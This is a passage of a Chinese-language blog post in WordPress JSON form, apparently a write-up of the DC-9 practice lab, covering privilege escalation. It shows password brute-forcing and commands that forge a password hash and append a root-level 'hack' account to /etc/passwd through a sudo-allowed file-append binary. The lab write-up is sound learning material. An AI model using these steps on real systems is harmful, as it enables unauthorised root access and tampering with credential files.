src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116485.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321204937022\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116486.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116486.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205015016\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116487.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116487.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205048170\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<p>\u7136\u540e\u5728\u6700\u540e\u4e00\u4e2a\u7528\u6237\u53d1\u73b0\u4e86\u4e00\u4e9b\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116488.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116488.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205218811\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c06\u5b57\u5178\u6dfb\u52a0\u5230\u5bc6\u7801\u5b57\u5178\u4e2d\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116489.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116489.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205513233\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53c8\u5f97\u5230\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\n<h3>\u5207\u6362\u81f3fredf<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116490.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116490.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205636077\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">file \/opt\/devstuff\/dist\/test\/test\n# \/opt\/devstuff\/dist\/test\/test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped<\/code><\/pre>\n<p>\u4f20\u5230\u672c\u5730\u5206\u6790\u4e00\u4e0b\uff0c\u4f46\u662f\u597d\u590d\u6742\uff0c\u4e0d\u7ba1\u4ed6\u4e86\uff0c\u5148\u8fd0\u884c\u4e00\u4e0b\u518d\u8bf4\uff1a<\/p>\n<pre><code class=\"language-text\">Usage: python test.py read append<\/code><\/pre>\n<p>\u67e5\u4e00\u4e0b\u8fd9\u4e2a<code>test.py<\/code>\uff1a<\/p>\n<pre><code>find \/ -name test.py  2&gt;\/dev\/null<\/code><\/pre>\n<pre><code class=\"language-text\">\/opt\/devstuff\/test.py\n\/usr\/lib\/python3\/dist-packages\/setuptools\/command\/test.py<\/code><\/pre>\n<pre><code class=\"language-bash\">cat \/opt\/devstuff\/test.py<\/code><\/pre>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python\n\nimport sys\n\nif len (sys.argv) != 3 :\n    print (&quot;Usage: python test.py read append&quot;)\n    sys.exit (1)\n\nelse :\n    f = open(sys.argv[1], &quot;r&quot;)\n    output = (f.read())\n\n    f = open(sys.argv[2], &quot;a&quot;)\n    f.write(output)\n    f.close()<\/code><\/pre>\n<p>\u4f20\u9012\u4e09\u4e2a\u53c2\u6570\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u662f <code>.\/test<\/code>\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4ee5\u8ffd\u52a0\u65b9\u5f0f\u5199\u8fdb\u7b2c\u4e09\u4e2a\u6587\u4ef6\u91cc\u3002<\/p>\n<p>\u76f4\u63a5\u5c31\u60f3\u5230\u4e86\u521b\u5efa\u4e00\u4e2aroot\u6743\u9650\u7684\u7528\u6237\u5b9e\u73b0\u767b\u5f55\uff01<\/p>\n<h3>\u521b\u5efaroot\u7528\u6237\u6dfb\u52a0\u8fdb\/etc\/passwd<\/h3>\n<h4>\u521b\u5efa\u7528\u6237<\/h4>\n<pre><code class=\"language-bash\">openssl passwd -1 -salt hack hack\n# $1$hack$xR6zsfvpez\/t8teGRRSNr.\necho &#039;hack:$1$hack$xR6zsfvpez\/t8teGRRSNr.:0:0:root:\/bin\/bash&#039; &gt; \/tmp\/hack\nsudo .\/test \/tmp\/hack \/etc\/passwd\ncat \/etc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116491.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116491.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321211528551\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116492.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116492.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321211615198\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5207\u6362\u62ff\u5230flag\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DC-9 \u6253\u5f00\u626b\u4e00\u4e0b\uff1a \u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0cnmap\u626b\u4e00\u4e0b\uff1a \u770b\u6765\u662f\u6ca1\u95ee\u9898\u4e86\uff0c\u53ef\u4ee5\u5f00\u59cb\u653b\u51fb\u4e86\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-438","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/438","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=438"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/438\/revisions"}],"predecessor-version":[{"id":439,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/438\/revisions\/439"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=438"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=438"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}